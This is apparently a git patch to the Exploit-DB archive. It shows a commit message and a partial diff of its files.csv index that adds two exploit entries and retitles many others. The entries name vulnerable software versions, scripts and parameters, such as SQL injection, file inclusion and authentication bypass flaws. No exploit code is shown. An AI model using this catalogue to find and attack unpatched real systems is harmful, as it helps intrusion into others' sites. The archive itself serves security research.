From 0d43a7fe093b8261f3bf077a3e31418c6dfe7648 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Thu, 5 Jan 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-01-05 2 new exploits Kaspersky 17.0.0 - Local CA root is Incorrectly Protected XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities XAMPP 1.7.4 - Cross-Site Scripting phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting ASPPortal 3.1.1 - (downloadid) SQL Injection ASPPortal 3.1.1 - 'downloadid' Parameter SQL Injection ASPPortal 4.0.0 - (default1.asp) SQL Injection ASPPortal 4.0.0 - 'default1.asp' SQL Injection ASPTicker 1.0 - (admin.asp) Login Bypass (SQL Injection) ASPTicker 1.0 - Authentication Bypass Active Photo Gallery - 'default.asp catid' SQL Injection Active Photo Gallery - 'catid' Parameter SQL Injection Active Trade 2 - 'default.asp catid' SQL Injection Active Trade 2 - 'catid' Parameter SQL Injection Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection SailPlanner 0.3a - (Authentication Bypass) SQL Injection Bluo CMS 1.2 - (index.php id) Blind SQL Injection SailPlanner 0.3a - Authentication Bypass Bluo CMS 1.2 - Blind SQL Injection ReVou Twitter Clone - (Authentication Bypass) SQL Injection Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection Active Force Matrix 2 - (Authentication Bypass) SQL Injection ASPReferral 5.3 - 'AccountID' Blind SQL Injection ActiveVotes 2.2 - (Authentication Bypass) SQL Injection Active Test 2.1 - (Authentication Bypass) SQL Injection Active Websurvey 9.1 - (Authentication Bypass) SQL Injection Active Membership 2 - (Authentication Bypass) SQL Injection eWebquiz 8 - (Authentication Bypass) SQL Injection Active NewsLetter 4.3 - (Authentication Bypass) SQL Injection Active Web Mail 4 - (Authentication Bypass) SQL Injection Active Trade 2 - (Authentication Bypass) SQL Injection Active Price Comparison 4 - (Authentication Bypass) SQL Injection PHP TV Portal 2.0 - (index.php mid) SQL Injection ReVou Twitter Clone - Authentication Bypass Ocean12 FAQ Manager Pro - 'ID' Parameter Blind SQL Injection Active Force Matrix 2 - Authentication Bypass ASPReferral 5.3 - 'AccountID' Parameter Blind SQL Injection ActiveVotes 2.2 - Authentication Bypass Active Test 2.1 - Authentication Bypass Active Websurvey 9.1 - Authentication Bypass Active Membership 2 - Authentication Bypass eWebquiz 8 - Authentication Bypass Active NewsLetter 4.3 - Authentication Bypass Active Web Mail 4 - Authentication Bypass Active Trade 2 - Authentication Bypass Active Price Comparison 4 - Authentication Bypass PHP TV Portal 2.0 - 'mid' Parameter SQL Injection Active Price Comparison 4 - 'ProductID' Blind SQL Injection Active Bids 3.5 - 'itemID' Blind SQL Injection Active Price Comparison 4 - 'ProductID' Parameter Blind SQL Injection Active Bids 3.5 - 'itemID' Parameter Blind SQL Injection Active Web Helpdesk 2 - (Authentication Bypass) SQL Injection Lito Lite CMS - 'cate.php cid' SQL Injection Active Test 2.1 - 'QuizID' Blind SQL Injection Active Web Helpdesk 2 - 'categoryId' Blind SQL Injection Active Photo Gallery 6.2 - (Authentication Bypass) SQL Injection Active Time Billing 3.2 - (Authentication Bypass) SQL Injection Active Web Helpdesk 2 - Authentication Bypass Lito Lite CMS - 'cid' Parameter SQL Injection Active Test 2.1 - 'QuizID' Parameter Blind SQL Injection Active Web Helpdesk 2 - 'categoryId' Parameter Blind SQL Injection Active Photo Gallery 6.2 - Authentication Bypass Active Time Billing 3.2 - Authentication Bypass Quick Tree View .NET 3.1 - (qtv.mdb) Database Disclosure Quick Tree View .NET 3.1 - Database Disclosure z1exchange 1.0 - (edit.php site) SQL Injection z1exchange 1.0 - 'site' Parameter SQL Injection E.Z. Poll 2 - (Authentication Bypass) SQL Injection ASPPortal 3.2.5 - (ASPPortal.mdb) Database Disclosure bcoos 1.0.13 - (viewcat.php cid) SQL Injection PacPoll 4.0 - (poll.mdb/poll97.mdb) Database Disclosure E.Z. Poll 2 - Authentication Bypass ASPPortal 3.2.5 - Database Disclosure bcoos 1.0.13 - 'viewcat.php' SQL Injection PacPoll 4.0 - Database Disclosure SunByte e-Flower - 'id' SQL Injection Rapid Classified 3.1 - (cldb.mdb) Database Disclosure Codefixer MailingListPro (MailingList.mdb) - Database Disclosure Gallery MX 2.0.0 - (pics_pre.asp ID) Blind SQL Injection SunByte e-Flower - 'id' Parameter SQL Injection Rapid Classified 3.1 - Database Disclosure Codefixer MailingListPro - Database Disclosure Gallery MX 2.0.0 - Blind SQL Injection Check New 4.52 - 'findoffice.php search' SQL Injection Joomla! Component com_jmovies 1.1 - 'id' SQL Injection Check New 4.52 - SQL Injection Joomla! Component JMovies 1.1 - 'id' Parameter SQL Injection Rae Media Contact MS - (Authentication Bypass) SQL Injection Multi SEO phpBB 1.1.0 - (pfad) Remote File Inclusion ccTiddly 1.7.4 - (cct_base) Multiple Remote File Inclusion Rae Media Contact MS - Authentication Bypass Multi SEO phpBB 1.1.0 - Remote File Inclusion ccTiddly 1.7.4 - 'cct_base' Parameter Remote File Inclusion Easy News Content Management - 'News.mdb' Database Disclosure Easy News Content Management - Database Disclosure My Simple Forum 3.0 - (index.php action) Local File Inclusion Joomla! Component mydyngallery 1.4.2 - (Directory) SQL Injection Gravity GTD 0.4.5 - (rpc.php objectname) Local File Inclusion / Remote Code Execution My Simple Forum 3.0 - Local File Inclusion Joomla! Component mydyngallery 1.4.2 - SQL Injection Gravity GTD 0.4.5 - Local File Inclusion / Remote Code Execution RankEm - 'rankup.asp siteID' SQL Injection RankEm - (Authentication Bypass) SQL Injection RankEm - 'siteID' Parameter SQL Injection Rankem - Authentication Bypass Merlix Teamworx Server - (File Disclosure/Bypass) Multiple Remote Vulnerabilities Cold BBS - 'cforum.mdb' Remote Database Disclosure Tizag Countdown Creator .v.3 - Insecure Upload Merlix Teamworx Server - File Disclosure/Bypass Cold BBS - Remote Database Disclosure Tizag Countdown Creator 3 - Insecure Upload ASP PORTAL - Multiple SQL Injections ASPTicker 1.0 - (news.mdb) Remote Database Disclosure ASP Portal - Multiple SQL Injections ASPTicker 1.0 - Remote Database Disclosure ASP PORTAL - 'xportal.mdb' Remote Database Disclosure phpPgAdmin 4.2.1 - (_language) Local File Inclusion ASP PORTAL - Remote Database Disclosure phpPgAdmin 4.2.1 - '_language' Parameter Local File Inclusion PayPal eStore - Admin Password Changing Exploit Product Sale Framework 0.1b - (forum_topic_id) SQL Injection PayPal eStore - Admin Password Change Product Sale Framework 0.1b - SQL Injection Mini-CMS 1.0.1 - 'index.php' Multiple Local File Inclusion Mini-CMS 1.0.1 - 'index.php' Local File Inclusion MG2 0.5.1 - 'Filename' Remote Code Execution MG2 0.5.1 - 'filename' Parameter Remote Code Execution dotnetindex Professional Download Assistant 0.1 - (Authentication Bypass) SQL Injection Poll Pro 2.0 - (Authentication Bypass) SQL Injection Professional Download Assistant 0.1 - Authentication Bypass Poll Pro 2.0 - Authentication Bypass Peel Shopping 3.1 - (index.php rubid) SQL Injection Peel Shopping 3.1 - 'rubid' Parameter SQL Injection ProQuiz 1.0 - (Authentication Bypass) SQL Injection ProQuiz 1.0 - Authentication Bypass PHPmyGallery 1.5beta - (common-tpl-vars.php) Local File Inclusion / Remote File Inclusion PHPmyGallery 1.5beta - 'common-tpl-vars.php' Local / Remote File Inclusion HTMPL 1.11 - (htmpl_admin.cgi help) Command Execution eZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation WebMaster Marketplace - 'member.php u' SQL Injection HTMPL 1.11 - Command Execution EZ Publish < 3.9.5/3.10.1/4.0.1 - Privilege Escalation WebMaster Marketplace - SQL Injection eZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required) EZ Publish 3.9.0/3.9.5/3.10.1 - Command Execution (Admin Required) eZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation EZ Publish < 3.9.5/3.10.1/4.0.1 - (token) Privilege Escalation ReVou Twitter Clone - Admin Password Changing Exploit ReVou Twitter Clone - Admin Password Change w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection w3blabor CMS 3.3.0 - Authentication Bypass rankem - File Disclosure / Cross-Site Scripting / Cookie Rankem - File Disclosure / Cross-Site Scripting / Cookie revou twitter clone - Cross-Site Scripting / SQL Injection Revou Twitter Clone - Cross-Site Scripting / SQL Injection My Simple Forum 7.1 - (Local File Inclusion) Remote Command Execution My Simple Forum 7.1 - Remote Command Execution Mini-CMS 1.0.1 - (page.php id) SQL Injection Mini-CMS 1.0.1 - 'page.php' SQL Injection Texas Rankem - 'player.asp player_id' SQL Injection Texas Rankem - 'player_id' Parameter SQL Injection Mini-CMS RibaFS 1.0 - (Authentication Bypass) SQL Injection Mini-CMS RibaFS 1.0 - Authentication Bypass reVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting ReVou Twitter Clone 2.0 Beta - SQL Injection / Cross-Site Scripting Andy's PHP KnowledgeBase Project 0.95.4 - SQL Injection Andy's PHP KnowledgeBase 0.95.4 - SQL Injection Andy's PHP KnowledgeBase 0.95.2 - (viewusers.php) SQL Injection Andy's PHP KnowledgeBase 0.95.2 - 'viewusers.php' SQL Injection Peel SHOPPING 2.8/ 2.9 - Cross-Site Scripting / SQL Injections Peel Shopping 2.8/ 2.9 - Cross-Site Scripting / SQL Injections PluggedOut CMS 0.4.8 - admin.php contenttypeid Parameter SQL Injection PluggedOut CMS 0.4.8 - 'contenttypeid' Parameter SQL Injection Texas Rankem - player.asp selPlayer Parameter SQL Injection Texas Rankem - tournaments.asp tournament_id Parameter SQL Injection Texas Rankem - 'selPlayer' Parameter SQL Injection Texas Rankem - 'tournament_id' Parameter SQL Injection Rapid Classified 3.1 - viewad.asp id Parameter SQL Injection Rapid Classified 3.1 - view_print.asp id Parameter Cross-Site Scripting Rapid Classified 3.1 - search.asp SH1 Parameter Cross-Site Scripting Rapid Classified 3.1 - reply.asp Multiple Parameter Cross-Site Scripting Rapid Classified 3.1 - advsearch.asp Denial of Serviceearch Parameter Cross-Site Scripting Rapid Classified 3.1 - 'viewad.asp' SQL Injection Rapid Classified 3.1 - 'view_print.asp' Cross-Site Scripting Rapid Classified 3.1 - 'search.asp' Cross-Site Scripting Rapid Classified 3.1 - 'reply.asp' Cross-Site Scripting Rapid Classified 3.1 - 'advsearch.asp' Cross-Site Scripting WebTester 5.0.20060927 - directions.php typeID Parameter SQL Injection WebTester 5.0.20060927 - 'typeID' Parameter SQL Injection phpPgAdmin 4.1.1 - SQLEDIT.php Cross-Site Scripting phpPgAdmin 4.1.1 - 'SQLEDIT.php' Cross-Site Scripting Rapid Classified - AgencyCatResult.asp SQL Injection Rapid Classified - 'AgencyCatResult.asp' SQL Injection bcoos 1.0.10 - /myalbum/ratephoto.php lid Parameter SQL Injection bcoos 1.0.10 - modules/mylinks/ratelink.php lid Parameter SQL Injection bcoos 1.0.10 - 'ratephoto.php' SQL Injection bcoos 1.0.10 - 'ratelink.php' SQL Injection bcoos 1.0.10 - adresses/ratefile.php SQL Injection bcoos 1.0.10 - 'ratefile.php' SQL Injection bcoos 1.0.13 - 'include/common.php' Remote File Inclusion bcoos 1.0.13 - 'common.php' Remote File Inclusion bcoos 1.0.13 - 'modules/banners/click.php' SQL Injection bcoos 1.0.13 - 'click.php' SQL Injection Z1Exchange 1.0 - showads.php id Parameter SQL Injection Z1Exchange 1.0 - showads.php id Parameter Cross-Site Scripting Z1Exchange 1.0 - 'id' Parameter SQL Injection Z1Exchange 1.0 - 'id' Parameter Cross-Site Scripting dotnetindex Professional Download Assistant 0.1 - SQL Injection Professional Download Assistant 0.1 - SQL Injection Active Bids - search.asp search Parameter Cross-Site Scripting Active Bids - search.asp search Parameter SQL Injection Active Bids - 'search' Parameter Cross-Site Scripting Active Bids - 'search' Parameter SQL Injection eZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting EZ Publish 4.x 'ezjscore' Module - Cross-Site Scripting Atlassian Confluence Jira 5.9.12 - Persistent Cross-Site Scripting --- files.csv | 218 ++++++++++++++++---------------- platforms/asp/webapps/1597.pl | 8 +- platforms/asp/webapps/2762.asp | 2 +- platforms/jsp/webapps/40989.txt | 90 +++++++++++++ platforms/windows/local/40988.c | 67 ++++++++++ 5 files changed, 272 insertions(+), 113 deletions(-) create mode 100755 platforms/jsp/webapps/40989.txt create mode 100755 platforms/windows/local/40988.c diff --git a/files.csv b/files.csv index 9dc3579e1..eb25b0c4e 100644 --- a/files.csv +++ b/files.csv @@ -5925,6 +5925,7 @@ id,file,description,date,author,platform,type,port 7135,platforms/windows/local/7135.htm,"Opera 9.62 - 'file://' Local Heap Overflow",2008-11-17,"Guido Landi",windows,local,0 7171,platforms/multiple/local/7171.txt,"PHP 5.2.6 - (error_log) Safe_mode Bypass",2008-11-20,SecurityReason,multiple,local,0 7177,platforms/linux/local/7177.c,"Oracle Database Vault - ptrace(2) Privilege Escalation",2008-11-20,"Jakub Wartak",linux,local,0 +40988,platforms/windows/local/40988.c,"Kaspersky 17.0.0 - Local CA root is Incorrectly Protected",2017-01-04,"Google Security Research",windows,local,0 7264,platforms/windows/local/7264.txt,"Apache Tomcat (Windows) - runtime.getRuntime().exec() Privilege Escalation",2008-11-28,Abysssec,windows,local,0 7309,platforms/windows/local/7309.pl,"Cain & Abel 4.9.24 - '.rdp' Stack Overflow",2008-11-30,SkD,windows,local,0 7313,platforms/linux/local/7313.sh,"Debian - (symlink attack in login) Arbitrary File Ownership (PoC)",2008-12-01,"Paul Szabo",linux,local,0 @@ -14690,7 +14691,7 @@ id,file,description,date,author,platform,type,port 36246,platforms/multiple/remote/36246.txt,"Splunk 4.1.6 - 'segment' Parameter Cross-Site Scripting",2011-10-20,"Filip Palian",multiple,remote,0 36250,platforms/windows/remote/36250.html,"Oracle AutoVue 20.0.1 - 'AutoVueX.ocx' ActiveX Control 'ExportEdaBom()' Insecure Method",2011-10-24,rgod,windows,remote,0 36256,platforms/hardware/remote/36256.txt,"Multiple Cisco Products - 'file' Parameter Directory Traversal",2011-10-26,"Sandro Gauci",hardware,remote,0 -36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-10-26,Sangteamtham,windows,remote,0 +36258,platforms/windows/remote/36258.txt,"XAMPP 1.7.4 - Cross-Site Scripting",2011-10-26,Sangteamtham,windows,remote,0 36264,platforms/php/remote/36264.rb,"Seagate Business NAS - Unauthenticated Remote Command Execution (Metasploit)",2015-03-04,Metasploit,php,remote,80 36286,platforms/hardware/remote/36286.txt,"DreamBox DM800 - 'file' Parameter Local File Disclosure",2011-11-04,"Todor Donev",hardware,remote,0 36291,platforms/windows/remote/36291.txt,"XAMPP 1.7.7 - 'PHP_SELF' Variable Multiple Cross-Site Scripting Vulnerabilities",2011-11-07,"Gjoko Krstic",windows,remote,0 @@ -15884,7 +15885,7 @@ id,file,description,date,author,platform,type,port 910,platforms/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Remote Exploit",2005-04-04,CereBrums,php,webapps,0 921,platforms/php/webapps/921.sh,"PHP-Nuke 6.x < 7.6 Top module - SQL Injection",2005-04-07,"Fabrizi Andrea",php,webapps,0 922,platforms/cgi/webapps/922.pl,"The Includer CGI 1.0 - Remote Command Execution (2)",2005-04-08,GreenwooD,cgi,webapps,0 -30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 +30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - 'Redirect.php' Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 @@ -16101,7 +16102,7 @@ id,file,description,date,author,platform,type,port 1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - (savesettings.php) Remote Code Execution",2006-03-18,DarkFig,php,webapps,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Blind SQL Injection",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 -1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - (downloadid) SQL Injection",2006-03-20,nukedx,asp,webapps,0 +1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' Parameter SQL Injection",2006-03-20,nukedx,asp,webapps,0 1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - (images.php) Remote Code Execution",2006-03-21,x128,php,webapps,0 1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution",2006-03-22,rgod,php,webapps,0 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0 @@ -16935,7 +16936,7 @@ id,file,description,date,author,platform,type,port 2759,platforms/php/webapps/2759.php,"PHPWind 5.0.1 - (AdminUser) Blind SQL Injection",2006-11-12,rgod,php,webapps,0 2760,platforms/php/webapps/2760.php,"Rama CMS 0.68 - (Cookie: lang) Local File Inclusion",2006-11-12,Kacper,php,webapps,0 2761,platforms/asp/webapps/2761.pl,"Munch Pro 1.0 - (switch.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 -2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - (default1.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 +2762,platforms/asp/webapps/2762.asp,"ASPPortal 4.0.0 - 'default1.asp' SQL Injection",2006-11-12,ajann,asp,webapps,0 2763,platforms/asp/webapps/2763.txt,"UStore 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2764,platforms/asp/webapps/2764.txt,"USupport 1.0 - (detail.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 2765,platforms/asp/webapps/2765.txt,"UPublisher 1.0 - (viewarticle.asp) SQL Injection",2006-11-12,ajann,asp,webapps,0 @@ -17122,7 +17123,7 @@ id,file,description,date,author,platform,type,port 3031,platforms/asp/webapps/3031.txt,"aFAQ 1.0 - (faqDsp.asp catcode) SQL Injection",2006-12-28,ajann,asp,webapps,0 3032,platforms/asp/webapps/3032.txt,"wywo inout board 1.0 - Multiple Vulnerabilities",2006-12-28,ajann,asp,webapps,0 3033,platforms/php/webapps/3033.txt,"phpBB2 Plus 1.53 - (Acronym Mod) SQL Injection",2006-12-28,"the master",php,webapps,0 -3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - (admin.asp) Login Bypass (SQL Injection)",2006-12-28,ajann,asp,webapps,0 +3035,platforms/asp/webapps/3035.txt,"ASPTicker 1.0 - Authentication Bypass",2006-12-28,ajann,asp,webapps,0 3036,platforms/php/webapps/3036.php,"WebText 0.4.5.2 - Remote Code Execution",2006-12-28,Kacper,php,webapps,0 3039,platforms/php/webapps/3039.txt,"EasyNews PRO News Publishing 4.0 - Password Disclosure",2006-12-29,bd0rk,php,webapps,0 3043,platforms/php/webapps/3043.txt,"x-news 1.1 - (users.txt) Remote Password Disclosure",2006-12-30,bd0rk,php,webapps,0 @@ -17415,7 +17416,7 @@ id,file,description,date,author,platform,type,port 3532,platforms/php/webapps/3532.txt,"study planner (studiewijzer) 0.15 - Remote File Inclusion",2007-03-21,K-159,php,webapps,0 3533,platforms/php/webapps/3533.txt,"Digital Eye CMS 0.1.1b - (module.php) Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3534,platforms/asp/webapps/3534.txt,"Active Link Engine - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 -3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'default.asp catid' SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 +3536,platforms/asp/webapps/3536.txt,"Active Photo Gallery - 'catid' Parameter SQL Injection",2007-03-21,CyberGhost,asp,webapps,0 3538,platforms/php/webapps/3538.txt,"PHP-revista 1.1.2 - Multiple SQL Injections",2007-03-21,"Cold Zero",php,webapps,0 3539,platforms/php/webapps/3539.txt,"Mambo Component nfnaddressbook 0.4 - Remote File Inclusion",2007-03-21,"Cold Zero",php,webapps,0 3542,platforms/php/webapps/3542.txt,"ClassWeb 2.0.3 - (BASE) Remote File Inclusion",2007-03-22,GoLd_M,php,webapps,0 @@ -17423,11 +17424,11 @@ id,file,description,date,author,platform,type,port 3545,platforms/php/webapps/3545.txt,"Lms 1.8.9 - Vala Remote File Inclusion",2007-03-22,Kacper,php,webapps,0 3546,platforms/asp/webapps/3546.txt,"AspWebCalendar 4.5 - 'eventid' Parameter SQL Injection",2007-03-22,parad0x,asp,webapps,0 3548,platforms/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - (op) Local File Inclusion",2007-03-23,GoLd_M,php,webapps,0 -3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'default.asp catid' SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 +3549,platforms/asp/webapps/3549.txt,"Active Trade 2 - 'catid' Parameter SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3550,platforms/asp/webapps/3550.txt,"ActiveBuyandSell 6.2 - (buyersend.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3551,platforms/asp/webapps/3551.txt,"Active Auction Pro 7.1 - (default.asp catid) SQL Injection",2007-03-23,CyberGhost,asp,webapps,0 3552,platforms/php/webapps/3552.txt,"Philex 0.2.3 - Remote File Inclusion / File Disclosure Remote",2007-03-23,GoLd_M,php,webapps,0 -3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - (ViewNewspapers.asp) SQL Injection",2007-03-23,ajann,asp,webapps,0 +3556,platforms/asp/webapps/3556.htm,"Active NewsLetter 4.3 - 'ViewNewspapers.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3557,platforms/php/webapps/3557.txt,"Joomla! / Mambo Component SWmenu 4.0 - Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 3558,platforms/asp/webapps/3558.htm,"eWebquiz 8 - 'eWebQuiz.asp' SQL Injection",2007-03-23,ajann,asp,webapps,0 3560,platforms/php/webapps/3560.txt,"Joomla! Component Joomlaboard 1.1.1 - (sbp) Remote File Inclusion",2007-03-23,"Cold Zero",php,webapps,0 @@ -20095,102 +20096,102 @@ id,file,description,date,author,platform,type,port 7263,platforms/php/webapps/7263.txt,"Booking Centre 2.01 - Authentication Bypass",2008-11-28,MrDoug,php,webapps,0 7265,platforms/php/webapps/7265.txt,"Web Calendar System 3.40 - Cross-Site Scripting / SQL Injection",2008-11-28,Bl@ckbe@rD,php,webapps,0 7266,platforms/php/webapps/7266.pl,"All Club CMS 0.0.2 - Remote Database Config Retrieve Exploit",2008-11-28,StAkeR,php,webapps,0 -7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - (Authentication Bypass) SQL Injection",2008-11-28,JIKO,php,webapps,0 -7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - (index.php id) Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 +7267,platforms/php/webapps/7267.txt,"SailPlanner 0.3a - Authentication Bypass",2008-11-28,JIKO,php,webapps,0 +7268,platforms/php/webapps/7268.txt,"Bluo CMS 1.2 - Blind SQL Injection",2008-11-28,The_5p3ctrum,php,webapps,0 7269,platforms/php/webapps/7269.pl,"CMS little 0.0.1 - 'term' Parameter SQL Injection",2008-11-28,"CWH Underground",php,webapps,0 -7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - (Authentication Bypass) SQL Injection",2008-11-28,R3d-D3V!L,php,webapps,0 -7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro (ID) - Blind SQL Injection",2008-11-28,Stack,php,webapps,0 -7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7280,platforms/asp/webapps/7280.txt,"Active NewsLetter 4.3 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - (Authentication Bypass) SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - (index.php mid) SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 +7270,platforms/php/webapps/7270.txt,"ReVou Twitter Clone - Authentication Bypass",2008-11-28,R3d-D3V!L,php,webapps,0 +7271,platforms/php/webapps/7271.txt,"Ocean12 FAQ Manager Pro - 'ID' Parameter Blind SQL Injection",2008-11-28,Stack,php,webapps,0 +7273,platforms/asp/webapps/7273.txt,"Active Force Matrix 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7274,platforms/asp/webapps/7274.txt,"ASPReferral 5.3 - 'AccountID' Parameter Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 +7275,platforms/asp/webapps/7275.txt,"ActiveVotes 2.2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7276,platforms/asp/webapps/7276.txt,"Active Test 2.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7277,platforms/asp/webapps/7277.txt,"Active Websurvey 9.1 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7278,platforms/asp/webapps/7278.txt,"Active Membership 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7279,platforms/asp/webapps/7279.txt,"eWebquiz 8 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7280,platforms/asp/webapps/7280.txt,"Active NewsLetter 4.3 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7281,platforms/asp/webapps/7281.txt,"Active Web Mail 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7282,platforms/asp/webapps/7282.txt,"Active Trade 2 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7283,platforms/asp/webapps/7283.txt,"Active Price Comparison 4 - Authentication Bypass",2008-11-29,R3d-D3V!L,asp,webapps,0 +7284,platforms/php/webapps/7284.txt,"PHP TV Portal 2.0 - 'mid' Parameter SQL Injection",2008-11-29,Cyber-Zone,php,webapps,0 7285,platforms/php/webapps/7285.txt,"CMS Made Simple 1.4.1 - Local File Inclusion",2008-11-29,M4ck-h@cK,php,webapps,0 7286,platforms/php/webapps/7286.txt,"OraMon 2.0.1 - Remote Config File Disclosure",2008-11-29,ahmadbady,php,webapps,0 7287,platforms/asp/webapps/7287.txt,"ActiveVotes 2.2 - 'AccountID' Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 7288,platforms/asp/webapps/7288.txt,"Active Web Mail 4 - Blind SQL Injection",2008-11-29,R3d-D3V!L,asp,webapps,0 -7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 -7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Blind SQL Injection",2008-11-29,Stack,php,webapps,0 +7289,platforms/php/webapps/7289.txt,"Active Price Comparison 4 - 'ProductID' Parameter Blind SQL Injection",2008-11-30,R3d-D3V!L,php,webapps,0 +7290,platforms/php/webapps/7290.txt,"Active Bids 3.5 - 'itemID' Parameter Blind SQL Injection",2008-11-29,Stack,php,webapps,0 7291,platforms/php/webapps/7291.pl,"OpenForum 0.66 Beta - Remote Reset Admin Password Exploit",2008-11-29,"CWH Underground",php,webapps,0 7292,platforms/asp/webapps/7292.txt,"ASPThai.Net Forum 8.5 - Remote Database Disclosure",2008-11-29,"CWH Underground",asp,webapps,0 -7293,platforms/asp/webapps/7293.txt,"Active Web Helpdesk 2 - (Authentication Bypass) SQL Injection",2008-11-29,Cyber-Zone,asp,webapps,0 -7294,platforms/php/webapps/7294.pl,"Lito Lite CMS - 'cate.php cid' SQL Injection",2008-11-29,"CWH Underground",php,webapps,0 